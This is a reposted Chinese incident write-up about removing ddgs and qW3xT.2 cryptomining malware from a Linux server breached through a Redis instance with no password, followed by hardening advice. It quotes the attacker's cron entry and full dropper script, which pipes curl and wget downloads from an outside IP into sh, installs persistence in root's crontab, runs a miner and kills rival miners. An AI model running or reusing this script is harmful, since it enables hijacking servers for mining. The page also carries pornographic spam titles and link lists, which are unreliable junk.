麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 服務器 > Linux服務器 > 正文

linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

2024-09-05 23:05:00
字體:
來源:轉載
供稿:網友

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。

本文主要介紹的是關于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說了,來一起看看詳細的介紹吧

被入侵后的現象:

發現有qW3xT.2與ddgs兩個異常進程,消耗了較高的cpu,kill掉后 過一會就會重新出現。

linux,服務器,ddgs,qW3xT.2,挖礦病毒

kill 掉這兩個異常進程后,過一段時間看到了如下進程:

linux,服務器,ddgs,qW3xT.2,挖礦病毒

首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本,輸入crontab -e 在其中找到了該定時任務

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國,i.sh 腳本內容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootecho "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootecho "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013if [ ! -f "/tmp/ddgs.3013" ]; then wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs killps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs killps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs killps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設置的免密登錄內容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379 配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

2.配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網      

入侵方式:

收集了相關資料,了解到其是利用redis漏洞,未設置密碼或密碼太簡單,導致的被入侵。

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379config get requirepass ##獲取當前密碼config set requirepass "yourpassword" ##設置當前密碼,服務重新啟動后又會置為默認,即無密碼;

永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對VEVB武林網的支持。


注:相關教程知識閱讀請移步到服務器教程頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 九九精品免费 | 国产成年人在线观看 | 一级黄色免费 | 国产精品爱久久久久久久 | 久久免费看片 | 91精品国产92久久久久 | 欧美精品一区二区久久 | 久久久入口 | 羞羞网站在线观看入口免费 | 刘亦菲一区二区三区免费看 | 久久国产一级 | 九九视屏 | 国产精品久久久久久久av三级 | 欧美成人精品一区二区男人小说 | 国产精品一区在线看 | 精品免费久久 | 亚洲网站在线播放 | 色综合久久久久久久久久久 | 日本精品黄色 | 鲁丝一区二区二区四区 | 欧美国产永久免费看片 | 国产免费片 | 中文字幕免费在线观看视频 | 日本成人一区 | 调教小男生抽打尿孔嗯啊视频 | 成人毛片100免费观看 | 污污黄| 黄色片网站免费 | 看免费毛片 | 国产精品99久久久久久董美香 | 毛片免费在线观看 | 免费一级在线视频 | 夜添久久精品亚洲国产精品 | 久久久成人免费视频 | 久色成人| 大西瓜永久免费av在线 | 2019天天干夜夜操 | 国产欧美一区二区三区免费看 | 国产午夜精品视频免费不卡69堂 | 黄色网电影| 久草手机在线视频 |